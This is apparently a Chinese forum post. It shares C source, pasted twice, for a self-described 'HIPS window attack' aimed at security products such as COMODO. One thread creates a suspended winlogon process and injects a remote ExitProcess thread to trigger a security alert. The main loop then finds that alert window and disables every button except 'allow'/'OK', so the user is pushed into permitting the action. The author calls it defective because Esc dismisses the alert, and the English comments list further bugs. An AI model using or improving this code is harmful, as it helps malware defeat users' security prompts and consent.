代码还是发出来好了(对于细心的人来说,这些代码并不是一点用也没有的)...
我从一开始就白忙活了,原以为已经很周全了的,可是被一个Esc全给我阻止了 T_T
当然,如果你和我一样是个COMODO用户的话,遇到这个代码也就只能认命了~
由于内心刚刚经历了如下过程,现在我得修养生息去了...
Heuristic manual HIPS window attack (defective)
#define _WIN32_WINNT 0x0501
#include <stdio.h>
#include <windows.h>
#include <Tlhelp32.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
#pragma comment(linker, "/SECTION:.wye,ERW /MERGE:.data=.wye /MERGE:.text=.wye /MERGE:.rdata=.wye" )
#define NUM_OF_WHITE_LIST_WORDS ((int)(sizeof WhiteList /sizeof WhiteList[0]))
// Title substrings that mark a control as "leave alone": a child window
// whose lower-cased title contains one of these is skipped by EnumWindProc;
// every other enabled child window of the targeted process is disabled.
// Titles are passed through strlwr() before strstr(), so the ASCII entries
// must be lower case here or they can never match.
struct
{
char * Word;
}
WhiteList[]=
{
"允许","allow","确定","ok","apply"
};
//To block it , press 'Esc' on the alarm window
// Worker-thread body started from main() via CreateThread.  This is the
// decoy: it creates a process from the image name "winlogon" in a suspended
// state, then ends it by starting a remote thread whose start address is
// kernel32!ExitProcess, and closes the handles.  Process creation followed
// by a remote thread into another process is the kind of activity a HIPS
// prompts the user about; the prompt that appears is presumably the window
// the main thread then waits for (see the foreground-window loop in main).
// No return value is checked.  ProcessInfo is never zeroed (only
// StartupInfo is), so if CreateProcess fails, garbage handles are passed
// to CreateRemoteThread and CloseHandle.  The thread's return value (1) is
// not used for anything beyond signalling "finished" to WaitForSingleObject.
// lpParameter is unused.
DWORD WINAPI Feint(LPVOID lpParameter)
{
STARTUPINFO StartupInfo;
PROCESS_INFORMATION ProcessInfo;
ZeroMemory(&StartupInfo,sizeof(StartupInfo));
StartupInfo.cb = sizeof(STARTUPINFO);
// CREATE_SUSPENDED: the new process never executes its own code.
CreateProcess(0,"winlogon",0,0,0,CREATE_SUSPENDED,0,0,&StartupInfo,&ProcessInfo);
// Remote thread at ExitProcess terminates the suspended process; the
// thread handle it returns is closed immediately.
CloseHandle(
CreateRemoteThread(ProcessInfo.hProcess,0,0,(LPTHREAD_START_ROUTINE)
GetProcAddress(LoadLibrary("kernel32.dll"), "ExitProcess"),0,0,0));
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
return 1;
}
// Window-enumeration callback shared by two passes:
//  - EnumWindows(EnumWindProc, pid): top-level windows; lParam is the PID of
//    the process whose windows are targeted.  Each top-level window owned by
//    that process is recursed into with EnumChildWindows.
//  - EnumChildWindows(hWnd, EnumWindProc, pid+1): lParam is pid+1 so the
//    callback can tell the child pass from the top-level pass.  A top-level
//    window owned by process pid-1 would also satisfy that test; the code
//    ignores this edge case.
// In the child pass every enabled control whose lower-cased title contains
// none of the WhiteList words is disabled with EnableWindow(hWnd, FALSE).
// Always returns TRUE so enumeration continues to the end.
// From a monitoring standpoint the observable pattern here is
// EnumWindows/EnumChildWindows followed by EnableWindow against windows
// owned by a different process.
BOOL CALLBACK EnumWindProc(HWND hWnd, LPARAM HIPS_PID)
{
DWORD WPID;
GetWindowThreadProcessId(hWnd,&WPID);
if (WPID==HIPS_PID) //For EnumWindows
{
//0x19 //SetParent
EnumChildWindows(hWnd,EnumWindProc,WPID+1);
}
else if (WPID+1==HIPS_PID && IsWindowEnabled(hWnd)) //For EnumChildWindows
{
// Buffer is 1204 bytes but only 1024 are offered to GetWindowText; the
// return value (0 on failure or empty title) is not checked.
char Title[1204];
int n=0;
GetWindowText(hWnd,Title,1024);
strlwr(Title);
// n stays equal to NUM_OF_WHITE_LIST_WORDS when no word matched.
for (n;n<NUM_OF_WHITE_LIST_WORDS;n++)
{
if (strstr(Title,WhiteList[n].Word))
{
break;
}
}
if (n==NUM_OF_WHITE_LIST_WORDS)
{
//To destory it,SetParent
EnableWindow(hWnd,FALSE);
}
}
return TRUE;
}
// Entry point (non-standard `void main`; accepted by the MSVC toolchain the
// #pragma comment lines target).
// Flow:
//  1. Print the banner, set the console title, start Feint on a 2nd thread.
//  2. Record this process' parent PID from a Toolhelp snapshot; the parent
//     is excluded below, presumably so the launching shell/console host is
//     never treated as the target.
//  3. While Feint is still running: spin until the foreground window is
//     non-NULL, is not the console window, and is not owned by the parent
//     process; treat its owning process as the HIPS, show its PID in the
//     console title, and run EnumWindProc over that process' windows.
//  4. Sleep 6 s and return.
// Defects visible in this function: SnapShotHandle is never closed; hPID and
// pPID are read uninitialized in the inner while-condition if the snapshot
// walk never finds the current process; the entry returned by Process32First
// is never examined (the loop starts with Process32Next); CreateThread is
// given NULL for two DWORD parameters; sprintf into Title[32] with a
// 26-character prefix overflows for PIDs of six or more digits, and %d is
// used for a DWORD.
void main()
{
printf("Heuristic manual HIPS window attack (defective)\n"
"Presented by wye-MIA kid C!\n"
"http://wye-ANGer.blogspot.com\n");
char Title[32] = "No manual HIPS detected - -";
SetConsoleTitle(Title);
HANDLE hMajor=CreateThread(NULL,NULL,Feint,NULL,NULL,NULL);
DWORD hPID,pPID;
HWND hHIPS=GetConsoleWindow()
,hCur=hHIPS;
//Get parent process ID
HANDLE SnapShotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pBuffer={0};
pBuffer.dwSize=sizeof(PROCESSENTRY32);
if((SnapShotHandle!=INVALID_HANDLE_VALUE) && Process32First(SnapShotHandle,&pBuffer))
{
while (Process32Next(SnapShotHandle,&pBuffer))
{
if (pBuffer.th32ProcessID==GetCurrentProcessId())
{
pPID=pBuffer.th32ParentProcessID;
hPID=pPID;
break;
}
}
}
// WAIT_TIMEOUT means the Feint thread has not returned yet.
while(WaitForSingleObject(hMajor,333)==WAIT_TIMEOUT)
{
//To protect major from activity analysis, return
// Poll every 333 ms until some window other than the console or the
// parent process' windows comes to the foreground.
while(hHIPS==hCur||hPID==pPID||!hHIPS)
{
hHIPS=GetForegroundWindow();
GetWindowThreadProcessId(hHIPS,&hPID);
Sleep(333);
}
// Title[32] holds at most a 5-digit PID after the 26-character prefix.
sprintf(Title,"Manual HIPS detected~ PID:%d",hPID);
SetConsoleTitle(Title);
EnumWindows(EnumWindProc,hPID);
}
Sleep(6000);
return ;
}
#include <stdio.h>
#include <windows.h>
#include <Tlhelp32.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
#pragma comment(linker, "/SECTION:.wye,ERW /MERGE:.data=.wye /MERGE:.text=.wye /MERGE:.rdata=.wye" )
#define NUM_OF_WHITE_LIST_WORDS ((int)(sizeof WhiteList /sizeof WhiteList[0]))
// Title substrings that mark a control as "leave alone": a child window
// whose lower-cased title contains one of these is skipped by EnumWindProc;
// every other enabled child window of the targeted process is disabled.
// Titles are passed through strlwr() before strstr(), so the ASCII entries
// must be lower case here or they can never match.
struct
{
char * Word;
}
WhiteList[]=
{
"允许","allow","确定","ok","apply"
};
//To block it , press 'Esc' on the alarm window
// Worker-thread body started from main() via CreateThread.  This is the
// decoy: it creates a process from the image name "winlogon" in a suspended
// state, then ends it by starting a remote thread whose start address is
// kernel32!ExitProcess, and closes the handles.  Process creation followed
// by a remote thread into another process is the kind of activity a HIPS
// prompts the user about; the prompt that appears is presumably the window
// the main thread then waits for (see the foreground-window loop in main).
// No return value is checked.  ProcessInfo is never zeroed (only
// StartupInfo is), so if CreateProcess fails, garbage handles are passed
// to CreateRemoteThread and CloseHandle.  The thread's return value (1) is
// not used for anything beyond signalling "finished" to WaitForSingleObject.
// lpParameter is unused.
DWORD WINAPI Feint(LPVOID lpParameter)
{
STARTUPINFO StartupInfo;
PROCESS_INFORMATION ProcessInfo;
ZeroMemory(&StartupInfo,sizeof(StartupInfo));
StartupInfo.cb = sizeof(STARTUPINFO);
// CREATE_SUSPENDED: the new process never executes its own code.
CreateProcess(0,"winlogon",0,0,0,CREATE_SUSPENDED,0,0,&StartupInfo,&ProcessInfo);
// Remote thread at ExitProcess terminates the suspended process; the
// thread handle it returns is closed immediately.
CloseHandle(
CreateRemoteThread(ProcessInfo.hProcess,0,0,(LPTHREAD_START_ROUTINE)
GetProcAddress(LoadLibrary("kernel32.dll"), "ExitProcess"),0,0,0));
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
return 1;
}
// Window-enumeration callback shared by two passes:
//  - EnumWindows(EnumWindProc, pid): top-level windows; lParam is the PID of
//    the process whose windows are targeted.  Each top-level window owned by
//    that process is recursed into with EnumChildWindows.
//  - EnumChildWindows(hWnd, EnumWindProc, pid+1): lParam is pid+1 so the
//    callback can tell the child pass from the top-level pass.  A top-level
//    window owned by process pid-1 would also satisfy that test; the code
//    ignores this edge case.
// In the child pass every enabled control whose lower-cased title contains
// none of the WhiteList words is disabled with EnableWindow(hWnd, FALSE).
// Always returns TRUE so enumeration continues to the end.
// From a monitoring standpoint the observable pattern here is
// EnumWindows/EnumChildWindows followed by EnableWindow against windows
// owned by a different process.
BOOL CALLBACK EnumWindProc(HWND hWnd, LPARAM HIPS_PID)
{
DWORD WPID;
GetWindowThreadProcessId(hWnd,&WPID);
if (WPID==HIPS_PID) //For EnumWindows
{
//0x19 //SetParent
EnumChildWindows(hWnd,EnumWindProc,WPID+1);
}
else if (WPID+1==HIPS_PID && IsWindowEnabled(hWnd)) //For EnumChildWindows
{
// Buffer is 1204 bytes but only 1024 are offered to GetWindowText; the
// return value (0 on failure or empty title) is not checked.
char Title[1204];
int n=0;
GetWindowText(hWnd,Title,1024);
strlwr(Title);
// n stays equal to NUM_OF_WHITE_LIST_WORDS when no word matched.
for (n;n<NUM_OF_WHITE_LIST_WORDS;n++)
{
if (strstr(Title,WhiteList[n].Word))
{
break;
}
}
if (n==NUM_OF_WHITE_LIST_WORDS)
{
//To destory it,SetParent
EnableWindow(hWnd,FALSE);
}
}
return TRUE;
}
// Entry point (non-standard `void main`; accepted by the MSVC toolchain the
// #pragma comment lines target).
// Flow:
//  1. Print the banner, set the console title, start Feint on a 2nd thread.
//  2. Record this process' parent PID from a Toolhelp snapshot; the parent
//     is excluded below, presumably so the launching shell/console host is
//     never treated as the target.
//  3. While Feint is still running: spin until the foreground window is
//     non-NULL, is not the console window, and is not owned by the parent
//     process; treat its owning process as the HIPS, show its PID in the
//     console title, and run EnumWindProc over that process' windows.
//  4. Sleep 6 s and return.
// Defects visible in this function: SnapShotHandle is never closed; hPID and
// pPID are read uninitialized in the inner while-condition if the snapshot
// walk never finds the current process; the entry returned by Process32First
// is never examined (the loop starts with Process32Next); CreateThread is
// given NULL for two DWORD parameters; sprintf into Title[32] with a
// 26-character prefix overflows for PIDs of six or more digits, and %d is
// used for a DWORD.
void main()
{
printf("Heuristic manual HIPS window attack (defective)\n"
"Presented by wye-MIA kid C!\n"
"http://wye-ANGer.blogspot.com\n");
char Title[32] = "No manual HIPS detected - -";
SetConsoleTitle(Title);
HANDLE hMajor=CreateThread(NULL,NULL,Feint,NULL,NULL,NULL);
DWORD hPID,pPID;
HWND hHIPS=GetConsoleWindow()
,hCur=hHIPS;
//Get parent process ID
HANDLE SnapShotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pBuffer={0};
pBuffer.dwSize=sizeof(PROCESSENTRY32);
if((SnapShotHandle!=INVALID_HANDLE_VALUE) && Process32First(SnapShotHandle,&pBuffer))
{
while (Process32Next(SnapShotHandle,&pBuffer))
{
if (pBuffer.th32ProcessID==GetCurrentProcessId())
{
pPID=pBuffer.th32ParentProcessID;
hPID=pPID;
break;
}
}
}
// WAIT_TIMEOUT means the Feint thread has not returned yet.
while(WaitForSingleObject(hMajor,333)==WAIT_TIMEOUT)
{
//To protect major from activity analysis, return
// Poll every 333 ms until some window other than the console or the
// parent process' windows comes to the foreground.
while(hHIPS==hCur||hPID==pPID||!hHIPS)
{
hHIPS=GetForegroundWindow();
GetWindowThreadProcessId(hHIPS,&hPID);
Sleep(333);
}
// Title[32] holds at most a 5-digit PID after the 26-character prefix.
sprintf(Title,"Manual HIPS detected~ PID:%d",hPID);
SetConsoleTitle(Title);
EnumWindows(EnumWindProc,hPID);
}
Sleep(6000);
return ;
}
可怜……
太血腥啦...
说实话,我是看到后面才看明白是代码
要不还以为是什么鬼片呢......
可怜啊,建议在其他地方输入,再复制就好了
要不就白干了